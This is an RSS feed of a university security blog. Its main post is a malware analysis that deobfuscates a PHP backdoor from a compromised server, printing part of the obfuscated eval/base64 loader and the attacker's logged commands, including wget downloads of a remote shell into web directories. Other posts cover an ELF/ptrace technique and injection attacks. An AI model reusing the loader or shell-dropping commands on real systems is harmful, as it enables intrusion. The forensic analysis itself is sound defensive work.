<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>ISIS &#187; Code</title>
	<atom:link href="http://isisblogs.poly.edu/category/code/feed/" rel="self" type="application/rss+xml" />
	<link>http://isisblogs.poly.edu</link>
	<description>Information Systems and Internet Security</description>
	<lastBuildDate>Mon, 20 Oct 2008 17:57:50 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
		<item>
		<title>Reverse Engineering a PHP &#8220;Virus&#8221;</title>
		<link>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/</link>
		<comments>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/#comments</comments>
		<pubDate>Sat, 23 Feb 2008 07:18:44 +0000</pubDate>
		<dc:creator>aleksey</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[Targeted Attacks]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/</guid>
		<description><![CDATA[In a recent incident a school server (not an ISIS server) was compromised. PHP code was injected that listened to and executed commands passed through a POST request with &#8216;www&#8217; user privileges. Some of the commands that were run include id, pwd as well as directory searches and wgets of various files. The compromised machine [...]]]></description>
			<content:encoded><![CDATA[<p>In a recent incident a school server (not an ISIS server) was compromised. PHP code was injected that listened to and executed commands passed through a POST request with &#8216;www&#8217; user privileges. Some of the commands that were run include <em>id, pwd</em> as well as directory searches and <em>wget</em>s of various files. The compromised machine also served as a hop in a pharmacy ad delivery scheme. It redirected HTTP requests for medications to a <em>possible</em> &#8216;mothership&#8217; server. There is evidence that links to our server were posted as ads on websites like MySpace.</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/sample_ads_small.JPG" rel="lightbox[54]"><img src="http://isisblogs.poly.edu/wp-content/uploads/sample_ads_small.JPG" alt="sample_ads" /></a></p>
<p><span id="more-54"></span></p>
<p>This post will focus on describing the deobfuscation process and inner workings of the PHP code that allowed the mentioned functionality. This is not a very hard case of obfuscation. I also suspect that there is an obfuscating tool out there that did this.</p>
<p>You are presented with an obfuscated PHP file. It is only two lines: one contains some readable code, and the other is completely obfuscated. Now what? You can execute it and watch for system calls, filesystem changes, network connections, etc. Or you can deobfuscate it manually and see exactly what it does.</p>
<p><font color="#0000ff"><strong>PARTIAL CODE:</strong></font></p>
<p>** Note, the original file has everything between &lt;?php ?&gt; tags on one line, and everything else on another. The below code is changed for readability.</p>
<pre>
&lt;?php

$OOO0O0O00=__FILE__;
$O00O00O00=__LINE__;
$OO00O0000=3024;

eval( gzuncompress( base64_decode(
'eNplj1dvwjAAhP9MpNgiCGcQEkV5YG/MXi9VhjMgCzsD+PUFtWorVXdPp7tPO
g4jhPBLyPTSjCSAwxh/BQJPbR4aVRBGBNTrHH4X34aeT3IGuJ+pICJJgca/WEG
6Co0X8Xtp+s8icdI4o4QxYFuMqMqHS5zUJYDlNKfAo8Ry/yJkVYMCfx90rWevc
z1N4uNo02qjw3yVyGoNb/Nxujj3Pfvih+Xj1hCl3V6pqOaQ5Zpl0XRWuPqwGZi8
wLc73V5/MByNJ9PZfIGXq/Vmu9sfjqezZTsu8fwgvFyjOEmzG2V5UVb3xxOJkq
w01Zam1xo8hNAgpRWB30PQ+ATAxF8l'
)));
return;
?&gt;

ZS1SnSy7fix0hJOsJgHQjOum3KfA+qjbZD9rzK0Bn0Mox055+qOlyP3NXGsN+N
n1s9TENweIiWrKaJuwjxWBQ1J7fyrY00bzj7nCW/f/63pqGxNSK7x8a2Dqy7y7
H+6/GWbanfTv9jvS1GGD9piUEOUb/eBfmgHXPHxCXCYZo6cPHCeoQEyh3Gm
Eau3z0i5sOeQNGynhwwKBes2XIjNPrsPSut4/Bz8AAE4KN4PdusO/v4OI5okUJ
......(skipping many bytes)......
Y9yT5MATh+TOXU8==</pre>
<p><em><br />
** Complete PHP file provided per request</em></p>
<p><font color="#0000ff"><strong>OBFUSCATION TECHNIQUES USED:</strong></font></p>
<p>(a) Variable name scrambling (e.g. $OO00O00O0, $IIIIIIII1II)<br />
(b) Insertion of NOP (no operation) statements such as:<br />
$LINE_NUM = 1;<br />
while(--$LINE_NUM) fgets($FILE_HANDLE,1024);<br />
(c) Use of compacting, mapping functions such as:<br />
strtr() or gzuncompress(base64_decode("string"));<br />
(d) Multiple rounds of obfuscation</p>
<p><font color="#0000ff"><strong>DEOBFUSCATION:</strong></font></p>
<p>The first line of the PHP file contains some readable code squeezed into one line. It needs to be made readable by separating it into multiple lines. Notice the eval(gzuncompress(base64_decode(scrambled code))) line. Replacing <em>eval()</em> with a <em>print</em> gets the job done: when the code is run, it spits out more code instead of executing it. Next, variable names such as $OOO0O0O00 are replaced with something more useful. The mapping of variables is noted, because as more code gets deobfuscated we need to look those names up.</p>
<pre>
&lt;?php

$FILE_NAME=__FILE__;    // Mine is "/home/aleksey/php_virus/file.php"
$LINE_NUM=__LINE__;     // It is "1". Explanation below
$SIZE=3024;

$FILE_HANDLE=fopen($FILE_NAME,'rb');
while(--$LINE_NUM) fgets($FILE_HANDLE,1024); // never gets executed
fgets($FILE_HANDLE,4096);    // reads in the first line, advances the file pointer

$CODE=
gzuncompress( base64_decode( strtr(
fread($FILE_HANDLE,368),
'xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
)));

//eval($CODE);
return;
?&gt;</pre>
<p>Explanation:</p>
<p>__FILE__ is the name of the script file currently being parsed. __LINE__ is the number of the line within the current script file. The code opens itself (its own file) for reading in binary mode. Then, there are <em>fgets()</em> commands for 1024 and 4096 bytes. Next, the $CODE variable is assigned a value and evaluated (another round of decryption).</p>
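<p>As a rough Python illustration of what swapping <em>eval()</em> for <em>print</em> exposes: PHP&#8217;s gzuncompress(base64_decode(...)) corresponds to zlib.decompress(base64.b64decode(...)). The payload below is a made-up stand-in built on the spot, not the blob from the infected file, and the helper name is hypothetical.</p>

```python
import base64
import zlib


def php_gzuncompress_base64(blob):
    """Python counterpart of PHP's gzuncompress(base64_decode($blob))."""
    return zlib.decompress(base64.b64decode(blob))


# Stand-in payload for illustration only; this is NOT the malware's data.
hidden_source = b"echo 'hello';"
blob = base64.b64encode(zlib.compress(hidden_source))

# Printing instead of evaluating shows the next layer without running it.
print(php_gzuncompress_base64(blob).decode("ascii"))
```

<p>The same helper should apply to any layer that uses the gzuncompress/base64_decode pair; layers that use gzinflate() need a raw DEFLATE decoder instead.</p>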
<p><strong>(2) Second round of decryption.</strong></p>
<p>We need to see what the value of $CODE is in cleartext. Once again, there is a &#8220;gzuncompress(base64_decode(&#8221; instruction, which is passed the return value of the <em>strtr()</em> function (not to be confused with <em>strstr()</em>). The <em>strtr()</em> function&#8217;s prototype is &#8220;string strtr(string $str, string $from, string $to)&#8221;. It returns a copy of &#8220;str&#8221;, translating all occurrences of each character in &#8220;from&#8221; to the corresponding character in &#8220;to&#8221;. So we have a character-for-character mapping, here from a scrambled alphabet back to the standard base64 alphabet. Now comes the complicated part.</p>
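<p>The <em>strtr()</em> mapping can be sketched in Python with str.maketrans(). The two alphabets are copied from the code above; everything else (function name, test payload) is an assumption made for illustration. One detail worth noting: the &#8220;from&#8221; string is one character longer than the &#8220;to&#8221; string, and PHP ignores the extra character of the longer argument, so the trailing &#8220;=&#8221; padding is left alone.</p>

```python
import base64
import zlib

SCRAMBLED = "xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h="
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# str.maketrans() insists on equal lengths, so trim to the shorter alphabet,
# which mirrors how PHP's strtr() ignores the surplus "=".
width = min(len(SCRAMBLED), len(STANDARD))
TO_STANDARD = str.maketrans(SCRAMBLED[:width], STANDARD[:width])
TO_SCRAMBLED = str.maketrans(STANDARD[:width], SCRAMBLED[:width])


def decode_layer(text):
    """Counterpart of gzuncompress(base64_decode(strtr($text, $from, $to)))."""
    return zlib.decompress(base64.b64decode(text.translate(TO_STANDARD)))


# Round trip on a made-up payload (not data from the infected file).
plain = b"print 'second stage';"
scrambled = base64.b64encode(zlib.compress(plain)).decode("ascii")
scrambled = scrambled.translate(TO_SCRAMBLED)

print(decode_layer(scrambled).decode("ascii"))
```

<p>Because the scrambled alphabet is a permutation of the standard one, the mapping is reversible, which is what makes the round trip above possible.</p>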
<p>The $str is a string of 368 bytes from the original file. But there are two <em>fgets()</em> statements that advance the file handle before the <em>fread()</em> can read in the 368 bytes. The first <em>fgets()</em> is not executed, because in &#8220;while(--$LINE_NUM) fgets($FILE_HANDLE,1024);&#8221; the value of LINE_NUM is 1, so the pre-decrement yields 0 and the loop body never runs. The second <em>fgets()</em> statement, &#8220;fgets($FILE_HANDLE,4096)&#8221;, is executed: it reads in the whole first line of the file. So the 368 bytes used in the strtr() call are the first 368 bytes of the second line in the original PHP file.</p>
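<p>The file-pointer bookkeeping is easy to get wrong, so here is a small Python sketch of it. It uses an in-memory fake file rather than the real sample, the function name is hypothetical, and readline(n) is only an approximation of PHP&#8217;s fgets($handle, n), which stops one byte earlier.</p>

```python
import io


def read_first_chunk(handle, line_number=1, chunk_size=368):
    """Mimic the loader: skip lines, eat the first line, read chunk_size bytes."""
    # while(--$LINE_NUM) fgets(...) runs line_number - 1 times,
    # which is zero times when __LINE__ is 1.
    for _ in range(line_number - 1):
        handle.readline(1024)
    # fgets($FILE_HANDLE,4096): consumes the first line (the readable PHP).
    handle.readline(4096)
    # fread($FILE_HANDLE,368): the start of the second line.
    return handle.read(chunk_size)


# Fake two-line file: a loader line, then 368 "A" bytes followed by other data.
fake_file = io.BytesIO(b"loader line\n" + b"A" * 368 + b"B" * 5)
chunk = read_first_chunk(fake_file)
print(len(chunk), fake_file.tell())
```

<p>After the call the handle sits 368 bytes into the second line, which matters for the next round.</p>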
<p>We use those 368 bytes in &#8220;gzuncompress(base64_decode(strtr(fread(&#8221; as the value returned by <em>fread()</em>. The resulting code, with cleaned-up variable names, is below. Notice that $CODE is replaced with its value. The replacement is almost the same as the previous code, except there is also an <em>ereg_replace()</em> call.</p>
<pre>
&lt;?php
$FILE_NAME=__FILE__;   // Mine is "/home/aleksey/php_virus/file.php"
$LINE_NUM=__LINE__;    // It is "1".
$SIZE=3024;

$FILE_HANDLE=fopen($FILE_NAME,'rb');
while(--$LINE_NUM) fgets($FILE_HANDLE,1024); // never gets executed
fgets($FILE_HANDLE,4096);

if (!function_exists('gzuncompress')) die('');

$CODE2=
ereg_replace(
'__FILE__',
"'" . $FILE_NAME . "'" ,
gzuncompress( base64_decode( strtr(
fread($FILE_HANDLE,$SIZE),
'xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
))));

fclose($FILE_HANDLE);
//eval($CODE2);
return;
?&gt;</pre>
<p><strong>(3) Third round of decryption:</strong></p>
<p>We now need to figure out the value of $CODE2. The <em>ereg_replace()</em> prototype is &#8220;string ereg_replace(string $pattern, string $replacement, string $string)&#8221;. It scans &#8220;string&#8221; for matches to &#8220;pattern&#8221;, then replaces the matched text with &#8220;replacement&#8221;. Right away we notice that &#8220;pattern&#8221; is the literal text __FILE__ and &#8220;replacement&#8221; is the quoted value of $FILE_NAME, which was itself set from __FILE__. For our purposes they are the same thing, so this is effectively another NOP. Again the focus is on &#8220;gzuncompress(base64_decode(strtr(&#8221;. This time, strtr() takes as its first argument $SIZE (3024) bytes from the second line of the original file. Don&#8217;t forget that in the previous round of decryption the FILE_HANDLE was advanced 368 bytes, so this read starts at offset 368 of that line. And behold, we finally get the (almost) final version of the code!</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/final_still_obfuscated_code.txt" title="code_version1">code_version1</a></p>
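<p>A minimal Python sketch of this round, under the same assumptions as before (fake in-memory file, hypothetical helper name): the third read picks up where the second one stopped, and the <em>ereg_replace()</em> call amounts to a literal substitution because the pattern contains no regex metacharacters.</p>

```python
import io

SIZE = 3024  # value of $SIZE in the loader


def quote_file_constant(decoded_source, file_name):
    """Stand-in for ereg_replace('__FILE__', "'" . $FILE_NAME . "'", $decoded)."""
    return decoded_source.replace("__FILE__", "'" + file_name + "'")


# Fake file: loader line, then 368 bytes (round 2) and SIZE bytes (round 3).
fake_file = io.BytesIO(b"loader line\n" + b"a" * 368 + b"b" * SIZE)
fake_file.readline()                # fgets($FILE_HANDLE,4096)
round_two = fake_file.read(368)     # consumed during the second round
round_three = fake_file.read(SIZE)  # starts at offset 368 of the second line

print(len(round_two), len(round_three))
print(quote_file_constant("include(__FILE__);", "/home/aleksey/php_virus/file.php"))
```

<p>In the real sample the SIZE bytes would still have to go through the strtr/base64/gzuncompress steps before the substitution is applied.</p>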
<p><strong>(4) Fourth round of deobfuscation.</strong></p>
<p>We finally have some useful PHP code, but part of it is still scrambled. There is another series of &#8220;gzinflate(base64_decode(&#8221; commands at the beginning of this code. I will simply present the results, as I have already described what to do. It is worth mentioning that this time you need to do 13 iterations on the same little piece of code to get to the cleartext code. This needs to be automated. The stopping condition is when there are no more &#8220;eval(gzinflate(base64_decode(&#8221; commands in the code. A Python script like <a href="http://isisblogs.poly.edu/wp-content/uploads/deobfuscate.txt" title="this">this</a> solves the problem.</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/final_deobfuscated_code.txt" title="code_version2">code_version2</a></p>
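<p>For readers who cannot fetch the linked script, here is an independent sketch of the same idea; it is not the script linked above. It assumes each layer looks exactly like eval(gzinflate(base64_decode('...'))); with single quotes, which may not match every sample, and it builds its own 13-layer test input with a hypothetical helper instead of using the malware.</p>

```python
import base64
import re
import zlib

# Assumed wrapper shape: eval(gzinflate(base64_decode('...')));
LAYER = re.compile(r"eval\(gzinflate\(base64_decode\('([^']*)'\)\)\);")


def peel_layers(source, max_rounds=50):
    """Unwrap nested layers until none remain; return (source, rounds)."""
    rounds = 0
    match = LAYER.search(source)
    while match is not None and rounds != max_rounds:
        packed = base64.b64decode(match.group(1))
        # gzinflate() reads a raw DEFLATE stream, hence wbits=-15.
        inner = zlib.decompress(packed, -15).decode("latin-1")
        source = source[:match.start()] + inner + source[match.end():]
        rounds += 1
        match = LAYER.search(source)
    return source, rounds


def wrap_layer(source):
    """Build one layer for the demo (hypothetical helper, not from the malware)."""
    packer = zlib.compressobj(wbits=-15)
    raw = packer.compress(source.encode("latin-1")) + packer.flush()
    encoded = base64.b64encode(raw).decode("ascii")
    return "eval(gzinflate(base64_decode('" + encoded + "')));"


layered = "echo 'done';"
for _ in range(13):
    layered = wrap_layer(layered)

clear, rounds = peel_layers(layered)
print(rounds, clear)
```

<p>The max_rounds cap is a safety net so that a malformed sample cannot keep the loop running forever; the actual stopping condition is the one described above, no more matching eval wrappers.</p>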
<p><font color="#0000ff"><strong>SUMMARY</strong></font></p>
<p>So what exactly does the code do?<br />
(a) Executes a command passed in $_POST["I1llI1"]. Could be any system command.<br />
(b) Its mothership is &#8220;hxxp://bessearches.info/virtual/gen.php&#8221;. Queries to our exploited server, such as &#8220;GET_php_virus?/phentermine/drug-phentermine.html&#8221;, are satisfied by pulling actual information from the mothership and displaying it on the exploited server.</p>
<p>What commands were run on the infected machine?<br />
There is no way of telling, as they were passed in the POST request. But during the sniffing phase, the attacker entered the following commands.</p>
<pre>
ls -lidpwd
find /Volumes/SSDrive/websites/SITENAMEHERE/ -user www -print
wget hxxp://www.pharmacy-directs.com/shell2.txt -O /Volumes/SSDrive/websites/SITENAMEHERE/allimages/rma.php
wget hxxp://www.pharmacy-directs.com/shell2.txt -O /Volumes/SSDrive/websites/SITENAMEHERE/unilogo/rma.php
find /Volumes/SSDrive/websites -user www -name "*.php" -ctime -40 -print
cat /Volumes/SSDrive/websites/SITENAMEHERE/images/faculty.php</pre>
<p>So we can see that the attacker was doing some reconnaissance as well as installing other backdoors.</p>
<p><font color="#0000ff"><strong>FOLLOW UP</strong></font></p>
<p>The mothership (<em>hxxp://bessearches.info/virtual/gen.php</em>) is still up. Simply entering this URL spits out an obfuscated string that looks like the second line of our file, but longer. If I have some free time, I will write a script to parse it.</p>
<p><font color="#0000ff"><strong>ADDITIONS</strong></font></p>
<p>[2008-02-25] This malware has backdoor and adware functionality and should be classified as such. (thanks <a href="http://schmoil.blogspot.com/" rel="external nofollow">Schmoilito</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>&#8220;All Injection Attack Vectors&#8221;</title>
		<link>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/</link>
		<comments>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/#comments</comments>
		<pubDate>Thu, 08 Feb 2007 05:05:09 +0000</pubDate>
		<dc:creator>Jason Bourne</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/</guid>
		<description><![CDATA[Over at Mokka mit Schlag, Elliotte Rusty Harold (he teaches Java/XML at Poly) is asking whether SQL is the only language with an injection attack vector. What about XML/XPath, JSON, etc.? Is there a comprehensive attack tree for injection attacks? See if you can answer some of these questions.
]]></description>
			<content:encoded><![CDATA[<p>Over at <em>Mokka mit Schlag</em>, Elliotte Rusty Harold (he teaches Java/XML at Poly) is asking whether SQL is the only language with an injection attack vector. What about XML/XPath, JSON, etc.? Is there a comprehensive attack tree for injection attacks? <a href="http://www.elharo.com/blog/software-development/web-development/2007/02/04/all-injection-attack-vectors/">See if you can answer some of these questions.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Prodding programs</title>
		<link>http://isisblogs.poly.edu/2007/02/06/prodding-programs/</link>
		<comments>http://isisblogs.poly.edu/2007/02/06/prodding-programs/#comments</comments>
		<pubDate>Tue, 06 Feb 2007 23:34:39 +0000</pubDate>
		<dc:creator>Yan Ivnitskiy</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Low-level]]></category>
		<category><![CDATA[Operating Systems]]></category>
		<category><![CDATA[Reverse Engineering]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/06/prodding-programs/</guid>
		<description><![CDATA[I will try to keep this to the point. Auto-completion on the terminal is something we all love and it makes using a UNIX system and running commands far more pleasant. Most shells can auto-complete path names, binary names, and built in commands. Bash goes further and supports auto-completing user names, hosts and a few [...]]]></description>
			<content:encoded><![CDATA[<p>I will try to keep this to the point. Auto-completion on the terminal is something we all love and it makes using a UNIX system and running commands far more pleasant. Most shells can auto-complete path names, binary names, and built in commands. Bash goes further and supports auto-completing user names, hosts and a few other trivial things. No shell that I know of has ever attempted to auto-complete the arguments that the binaries take. Leaving out support for this makes sense, as there is no common way for a binary to store the arguments it can take inside the program binary, and it is bound to be a porting nightmare.</p>
<p>Keeping this in mind, I realized that almost every single UNIX binary gets its arguments from the shell in a standard, POSIX-compliant way. The <a href="http://www.freebsd.org/cgi/man.cgi?query=getopt&#038;apropos=0&#038;sektion=3&#038;manpath=FreeBSD+6.2-RELEASE&#038;format=html">getopt</a> libc function call parses the input from the shell into usable internal flags. If one were to peek at what each binary gives to getopt(), one would find out all the arguments it expects to take and gain more insight into the executable! This is what I have done and what the remainder of the post is about.</p>
<p>This is what my previous post related to. Now, I realize this is a slightly silly goal. My primary reason for doing this is to learn the techniques I&#8217;ve used to get there, which I simply could not learn without experimentation and a concrete goal in mind. The problem was attacked as follows:</p>
<p><span id="more-13"></span></p>
<p>Each step has an explanation below it:</p>
<h2>How this works</h2>
<ol>
<li>I use <a href="http://wiki.freebsd.org/LibElf">libelf(3)</a> to open the binary, and read its sections.</li>
<ul>
<li>Most UNIX binaries are in the ELF format. The official draft is included in the tarball at the end of this post. ELF (or Executable and Linkable Format) is a file format that most UNIX systems today understand.</li>
</ul>
<li>The sections I care about are the PLT and the dynamic symbols section.</li>
<ul>
<li>An ELF file stores its information in sections. The two sections I mentioned are the one that contains the dynamic symbols and the procedure linkage table (PLT).
<ul>
<li><b>Dynamic symbols</b> &#8211; When you write a program that uses a shared library (libc being the prime example), one copy of the library is shared among many processes, and when you compile the program, the actual code from libc does not get compiled into the binary. What happens is that your compiler leaves a little note to your operating system (or the operating system loader [Not the boot loader! <img src='http://isisblogs.poly.edu/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ]) saying &#8220;Here I call some functions that should be in a shared library that you might have loaded, and if not you can load it as you need it. I will be calling printf and getopt, so I will refer to them as if I have them. Please fill in those references as you find your own copy of libc&#8221;. That list of functions is called the <b>dynamic symbol</b> table. Each process that utilizes shared libraries (which is almost all of them) has a GOT (Global Offset Table), which is a table that maps those symbols to the locations in the library where the code actually is. So when you call printf() in your code, the compiled instructions actually look at the printf() entry in the GOT and jump to whichever address it points to. When you leave those references &#8216;open&#8217; as I mentioned earlier, those entries are simply not filled in. When the loader resolves those references, it fills in the proper address within the shared library. So to picture it, the flow of execution is as follows: printf() --&gt; GOT --&gt; actual printf code. Now, for reasons outside the scope of this post, there is yet another level of indirection. So in reality the flow is: printf() --&gt; PLT --&gt; GOT --&gt; actual printf(). The <b>PLT</b> is a series of jump statements that go through the GOT. This jump table is what we focus on.
	 		</ul>
</ul>
<li>I then extract the position of the getopt symbol and look it up in the PLT.</li>
<ul>
<li>From the information I retrieved using libelf, I check at which address the PLT gets loaded (section &#8216;.plt&#8217;), then I check the index of the getopt symbol in the symbol table, and I obtain the address of the PLT entry by simply computing: .plt + (getopt position + 1) * 0x10 (0x10 is the size of a PLT entry as far as I know, and the +1 is because I want to skip the 0th entry of the PLT)
	</ul>
<li>I start the binary, overwrite the proper address, set a breakpoint, and extract the arguments.</li>
<ul>
<li>I now have the jump that gets taken every time getopt gets called. I now fork(), and before I execv() the process, I enable the child to be traced with the ptrace(2) interface. This is the same method that debuggers use to attach to processes. If the child is being traced, the parent gets notified once the child has finished loading. Once I get notified that it is created, with the proper address of getopt in hand, I overwrite that jmp instruction with an int3 instruction (0xCC assembled). Something to note: in my code I overwrite it with 0xcccccccc, which is just four int3 instructions. I didn&#8217;t want to bother with byte-ordering or alignment issues, so I just overwrote the entire word. Since the instruction is only one byte, it works just fine. This instruction will trap into the parent once reached. This is also how debuggers set breakpoints, with a slight difference: they save the original instruction they overwrote so they can restore it on the next execution, but since I simply don&#8217;t care for it to continue running, I can just go walking all over it. Now I continue the child process.</li>
<li>All my child interaction and prodding was done with the ptrace() system call.</li>
<li>Once the parent gets trapped again, I know that I am at the point where getopt() was JUST called. If you remember, the standard C calling convention on i386 is to push all the arguments onto the stack, last argument first, and then call the function. So %esp points at the return address with the arguments right above it, and at a known offset is the last argument: the string of every option that the binary is expecting, which is what I care about.</li>
<li>I now know where the string of arguments is in the child&#8217;s address space, at which point I can safely extract it, then kill the child process before it does anything. How mean.</li>
</ul>
<li>I can now rinse+repeat for other binaries in which I&#8217;m interested.</li>
</ol>
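<p>The two bits of arithmetic in the steps above can be written down in a few lines of Python. This is only a sketch of the address calculations, not the C code from the tarball: the function names and the example addresses are made up, the 0x10 entry size is the figure quoted above, and the stack layout assumes the trap fires at the PLT entry on i386, right after the call instruction has pushed a return address.</p>

```python
PLT_ENTRY_SIZE = 0x10  # size of one i386 PLT entry, as stated in the post
WORD = 4               # size of a stack slot on i386


def plt_entry_address(plt_base, symbol_position):
    """Address of a symbol's PLT entry; the +1 skips the reserved 0th entry."""
    return plt_base + (symbol_position + 1) * PLT_ENTRY_SIZE


def optstring_slot(esp):
    """Stack slot holding getopt's third argument when the trap is hit.

    Assumed layout: [esp] return address, [esp+4] argc,
    [esp+8] argv, [esp+12] optstring.
    """
    return esp + WORD + 2 * WORD


# Hypothetical values, chosen only to show the arithmetic.
print(hex(plt_entry_address(0x8048500, 5)))
print(hex(optstring_slot(0xBFBFE000)))
```

<p>The slot returned by optstring_slot() holds a pointer, so a tracer would read that word first and then read the string it points to from the child&#8217;s address space.</p>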
<h2>Why this works</h2>
<ol>
<li>Most programs call getopt() as one of the absolute first things they do. This means that there is a very low chance that any side effects will come up.</li>
<li>This is fast, since the OS only loads the pages of code that are being executed, and there is a very high chance that getopt will live in the first page of code.</li>
</ol>
<p>Something to note here: not all binaries use getopt. This is a problem, but not one that I care to fix. This took a little over three weeks to complete due to the lack of material on the matter on the Internet and the <i>slightly</i> esoteric nature of the solution. Check out the ltrace utility if you want something like what I wrote, on steroids (it outlines every single library call with all arguments).</p>
<p>I originally attempted to read ltrace source to figure out how to solve the problem, but it confused me more than it helped me. In the end a sit down with the ELF spec and some time is what it took.</p>
<p>If you have <b>any</b> questions, comments, additions or critiques, please either comment on the post or send me an email.</p>
<p>The code I wrote and used can be found here: <a href="http://isis.poly.edu/~yan/readgo.tbz">http://isis.poly.edu/~yan/readgo.tbz</a> (You&#8217;d need libelf installed to get it to compile/run). This only works on FreeBSD/i386. Linux has a slightly different ptrace() interface, so porting will be trivial, but existent.</p>
<p>Since everyone loves some sample output:</p>
<blockquote><p>
yan@tissue$ ./readgo /bin/ls /bin/rm<br />
/bin/ls: 1ABCFGHILPRSTUWZabcdfghiklmnopqrstuwx<br />
/bin/rm: dfiIPRrvW
</p></blockquote>
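<p>To turn a recovered string into something an auto-completer could use, the getopt convention is that each character is an option letter and a following colon means the option takes an argument. A small Python sketch, with a hypothetical function name, that is not part of readgo:</p>

```python
def parse_optstring(optstring):
    """Map each option letter to True if getopt expects an argument for it."""
    options = {}
    for position, char in enumerate(optstring):
        if char == ":":
            continue  # colons only qualify the preceding letter
        options[char] = optstring[position + 1:position + 2] == ":"
    return options


# The /bin/rm string from the sample output above.
rm_options = parse_optstring("dfiIPRrvW")
print(" ".join("-" + letter for letter in sorted(rm_options)))

# A made-up string showing an option that takes an argument.
print(parse_optstring("ab:c"))
```

<p>None of the letters in the sample output above is followed by a colon, so for those two binaries every option would be reported as a plain flag.</p>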
<p>edit: Fixed a lot of grammatical mistakes thanks to Kurt.</p>
<p>Thanks for reading,<br />
Yan</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/06/prodding-programs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Tools for implicit code understanding</title>
		<link>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/</link>
		<comments>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/#comments</comments>
		<pubDate>Tue, 06 Feb 2007 01:53:47 +0000</pubDate>
		<dc:creator>Yan Ivnitskiy</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Operating Systems]]></category>
		<category><![CDATA[Reverse Engineering]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/</guid>
		<description><![CDATA[In the last few weeks, I have been needing to understand a lot of existing source code. People, including myself, often try to reverse-engineer binaries and not pay much attention to reverse-engineering available code, if that&#8217;s the proper way to call it. While not reverse-engineering in its core, analyzing source code tends to tickle similar [...]]]></description>
			<content:encoded><![CDATA[<p>In the last few weeks, I have needed to understand a lot of existing source code. People, including myself, often try to reverse-engineer binaries and do not pay much attention to reverse-engineering available code, if that&#8217;s the proper thing to call it. While not reverse-engineering at its core, analyzing source code tends to tickle similar parts of the brain as reverse-engineering binaries. This post is a short description of the tools and techniques I&#8217;ve been using, and I hope to receive suggestions for techniques I have been missing.</p>
<p>The code in question is ltrace, which I believe is mostly the work of the Debian project (I could be wrong), with a port to FreeBSD, which is what I have been using. I have spent enough hours trying to just read source code, using grep to figure out where to look next.</p>
<p>Read on for descriptions!</p>
<p><span id="more-11"></span></p>
